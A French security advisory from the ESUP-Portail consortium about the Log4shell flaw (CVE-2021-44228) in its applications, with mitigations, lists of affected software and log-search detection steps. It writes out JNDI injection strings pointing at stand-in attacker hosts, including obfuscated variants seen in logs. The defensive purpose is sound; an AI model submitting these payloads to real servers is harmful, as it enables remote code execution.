Sécurité
Pages enfant
  • ESUP-2021-AVI-001 - Log4shell

Vous regardez une version antérieure (v. /wiki/spaces/SECU/pages/1073315849/ESUP-2021-AVI-001+-+Log4shell) de cette page.

afficher les différences afficher l'historique de la page

« Afficher la version précédente Vous regardez la version actuelle de cette page. (v. 14) afficher la version suivante »

Utilisation et diffusion de ce document

Les avis de sécurité du consortium ESUP-Portail portent sur des vulnérabilités des logiciels diffusés par le consortium. Il est de la responsabilité de chacun des destinataires de ce document de ne pas le rediffuser en dehors du cadre pour lequel il a été écrit, pour des raisons évidentes de sécurité des Systèmes d'Information de tous les établissements du consortium ESUP-Portail.

Objet

Log4shell - CVE-2021-44228 vis à vis des applications ESUP

Référence

ESUP-2021-AVI-001

Date de la première version

12 décembre 2021

Date de la dernière version

12 décembre 2021

Source

CVE-2021-44228

Diffusion de cette version

Publique

Historique

  • 10 décembre 2021 : réception de la faille CVE-2021-44228 et CERTFR-2021-ALE-022 (Damien Berjoan)
  • 10-11 décembre 2021 : reproduction de l'exploit via des POC (Pascal Rigaux)
  • 11 décembre 2021 : état des lieux des applications ESUP affectés (coordination technique)
  • 12 décembre 2021 : rédaction de l'avis (Pascal Rigaux, Vincent Bonamy, Damien Berjoan)
  • 13 décembre 2021 : envoi de l'avis de sécurité à securite@esup-portail.org
  • 13 décembre 2021 : envoi de l'avis de sécurité à esup-utilisateurs@esup-portail.org
  • 13 décembre 2021 : publication de l'avis

Planning prévisionnel

-

Pièces jointes

-

Risque

  • Possibilité pour un attaquant d'envoyer et faire exécuter du code arbitraire à un serveur.

Systèmes affectés

La faille concerne toutes les versions de log4j 2.x. Elle est corrigée dans la version 2.15.0.

  • log4j (1.x) n'est pas concerné ; c'est un projet distinct de log4j2
  • la faille est exploitable dans toutes les versions de Java (notamment avec tomcat)
  • les versions à jour de java réduisent la surface d'attaque
  • Apereo CAS est particulièrement exposé

Description

Exemple (simple) avec un serveur Apereo CAS vulnérable (dans les conditions d'exploitation les plus défavorables).

  • L'attaquant saisit en tant que username dans le formulaire d'authentification /login la chaine "${jndi:ldap://serveur-attaquant-ldap.com/ExploitLog4j2}" et un mot de passe quelconque
  • CAS log ce username dans cas_audit.log (authentification échouée)
    • la chaine "${jndi:ldap://serveur-attaquant-ldap.com/ExploitLog4j2}" est parsée par log4j
    • l'expression jndi est évaluée, une récupération de l'object ldap donné par ldap://serveur-attaquant-ldap.com/ExploitLog4j2Ref est effectuée
    • cet objet correspond à une référence sur http://serveur-attaquant-http.com/ExploitLog4j2.class
    • la classe http://serveur-attaquant-http.com/ExploitLog4j2.class est récupérée et exécutée

Solutions

  • technique "mettre à jour" : remplacer les jars de log4j-core par la version 2.15.0 (attention maven central fournit une version compilée pour Java ≥ 8)

  • technique "zip" : supprimer la classe du jar

    zip -q -d log4j-core*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  • technique "configurer" : si log4j-core ≥ 2.10, ajouter ceci à la ligne de commande java

    -Dlog4j2.formatMsgNoLookups=true
  • technique "firewall" : empêcher les requêtes TCP sortantes du serveur

NB : il faut redémarrer le service pour appliquer la modification (sauf pour la technique "firewall")

Applications concernées

Apereo CAS

  • ≤ 4.0 : pas affecté
  • ≤ 5.2 : technique "mettre à jour" ou "zip" ou "firewall"
  • ≥ 5.3 : technique "mettre à jour" ou "zip" ou "firewall" ou "configurer"
  • >= 6.3.7.2.ou >= 6.4.4 : versions des branches 6.3 et 6.4 (les seules maintenues ; les autres sont considérées comme obsolètes) corrigées

Nuxeo

  • 10.10 : technique "mettre à jour" ou "zip" ou "firewall" ou "configurer"

Elasticearch

  • 6.5.3 debian 9 : technique "mettre à jour" ou "zip" ou "firewall" ou "configurer"
  • 7.9.1 : technique "mettre à jour" ou "zip" ou "firewall" ou "configurer"

Logstash

  • technique "zip" ou "firewall" (la technique "configurer" ne marche pas !)

Solr

  • 8.5.1 : technique "mettre à jour" ou "zip" ou "firewall" ou "configurer"

Shibboleth idp

Internet2 Grouper


Applications non concernées

  • esup-ecandidat
  • esup-mdw (MonDossierWeb v3)
  • esup-pod
  • esup-pstage
  • esup-signature

  • esup-smsu

  • esupUserApps / ProlongationENT

  • esup-sgc
  • esup-nfc-tag
  • esup-papercut
  • esup-pay
  • esup-helpdesk
  • uportal et portlets associées
  • shibboleth idp (sauf docker)
  • bbb 2.2
  • ametys odf
  • ade
  • ksup

  • esup-dematec - elle embarque des librairies log4j-2 qui ne sont pas utilisées : log4j (1) est utilisé : configuration par log4j.properties

  • ...

Librairies log Java

Pour déterminer si une application java est impactée il faut déterminer quelle librairie de log est utilisée.

En java, 3 librairies (implémentations) de logs sont principalement utilisées : log4j, log4j2 et logback.

log4j est la librairie historique : elle est encore très utilisée. log4j est un projet distinct de log4j2

On peut trouver d'anciennes librairies telles que commons-logging qui offrent une couche d'abstraction à log4j.

log4j tend à être remplacée par log4j2 ou logback.

slf4j peut être utilisée comme API (couche d'abstraction) au dessus de ces librairies ; pour le développeur cela permet théoriquement de changer d'implémentation rapidement (passer de log4j2 à logback par exemple).

En tant qu'exploitant vous pouvez retrouver ces librairies sous forme de jar. Au niveau des sources, on retrouve leurs références généralement dans des fichiers pom.xml (maven) ou build.gradle (gradle).

Vous pouvez aussi +/- retrouver l'implémentation de librairie de logs utilisée suivant les configurations de ces logs ; même si il peut y avoir des variantes, adaptation du développeur, configurations implicites ...  :

  • log4j.properties, ... : log4j, 
  • log4j2.properties, log4j2.xml, ... : log4j2, 
  • logback.xml, ... : logback 

Analyse des logs

Exemple avec un serveur Apereo CAS 

Lors d'une tentative d'authentification, Apereo CAS peut loguer avec log4j-2 le username, l'"adresse ip" (entête http x-forwarded-for lorsqu'on se place derrière un proxy), le user-agent (entête http également qui peut être forgée) ...

Vous pouvez rechercher '${' ou encore 'Reference Class' pour voir si une tentative d'exploitation de la faille a été opérée.

Exemple :

grep '${\|Reference Class' /opt/tomcat-cas/logs/cas.log 
2021-12-11 05:48:59,478 WARN [org.apereo.cas.web.flow.SpnegoNegotiateCredentialsAction] - <User Agent header [${jndi:${lower:l}${lower:d}a${lower:p}://toto.log4j2${upper:a}attaq.io:80/callback}] is not supported in the list of supported browsers [[Firefox]]>
grep '${\|Reference Class' /opt/tomcat-cas/logs/cas_audit.log 
CLIENT IP ADDRESS: ${jndi:ldap://X-Forwarded-For.univ-ville.fr.id-de-test.solution-de-test.net/a.bc}
CLIENT IP ADDRESS: ${jndi:ldap://hack.me:1389//univ-ville.fr/X-Forwarded-For}
CLIENT IP ADDRESS: Reference Class Name: foo

Notes supplémentaires

La chaine Reference Class peut correspondre (sauf si la chaine a été rentrée telle quelle) à une expression ${... qui a résulté de la récupération d'une référence à une classe elle-même non récupérée/exécutée. 

Lorsque la chaine ${.. est présente: elle a pu ne pas être interprétée (cas d'un CAS dont la vulnérabilité est fixée) ou elle a pu être interprétée de bout en bout (récupération de la référence, récupération du code) ; une analyse plus poussée (flux) est à envisager.

Liens



  • Aucune étiquette